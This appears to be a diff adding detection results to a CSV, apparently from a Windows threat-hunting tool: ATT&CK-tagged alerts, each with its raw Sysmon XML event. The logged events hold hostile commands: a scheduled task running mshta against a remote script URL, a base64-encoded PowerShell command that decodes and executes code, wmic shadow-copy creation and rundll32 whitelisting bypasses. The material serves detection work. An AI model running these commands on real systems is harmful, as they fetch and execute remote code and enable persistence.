+    <Data Name=""ProcessId"">3560</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
+    </TimeCreated>
+    <EventRecordID>16390</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
+    <Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
+    <Data Name=""ProcessId"">3560</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.893033Z"">
+    </TimeCreated>
+    <EventRecordID>5940</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.852</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00102FAAFF00</Data>
+    <Data Name=""ProcessId"">3304</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
+    </TimeCreated>
+    <EventRecordID>16390</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
+    <Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
+    <Data Name=""ProcessId"">3560</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-22T04:02:11.307031Z"">
+    </TimeCreated>
+    <EventRecordID>839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1920"" ThreadID=""824"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-22 04:02:11.287</Data>
+    <Data Name=""ProcessGuid"">365ABB72-C9C3-5CE4-0000-00101F422E00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-C32E-5CE4-0000-00205DF00000</Data>
+    <Data Name=""LogonId"">0xf05d</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-C9C1-5CE4-0000-00100B222E00</Data>
+    <Data Name=""ParentProcessId"">3156</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; SCODEF:1600 CREDAT:275470 /prefetch:2</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:47.478285Z"">
+    </TimeCreated>
+    <EventRecordID>6182</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:47.456</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010D33A0C00</Data>
+    <Data Name=""ProcessId"">3344</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
+    <Data Name=""ParentProcessId"">3448</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:20.711067Z"">
+    </TimeCreated>
+    <EventRecordID>4907</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:19.556</Data>
+    <Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
+    <Data Name=""ProcessId"">3164</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49826</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:59.769825Z"">
+    </TimeCreated>
+    <EventRecordID>4129</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:59.729</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A2B-5CE4-0000-00102F502201</Data>
+    <Data Name=""ProcessId"">3772</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ParentProcessId"">2432</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T22:52:27.588976Z"">
+    </TimeCreated>
+    <EventRecordID>10154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1936"" ThreadID=""1644"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 22:52:27.588</Data>
+    <Data Name=""ProcessGuid"">365ABB72-D1AB-5CC8-0000-0010DB1E4400</Data>
+    <Data Name=""ProcessId"">1372</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
+    <Data Name=""LogonId"">0xffe4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
+    <Data Name=""ParentProcessId"">2892</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
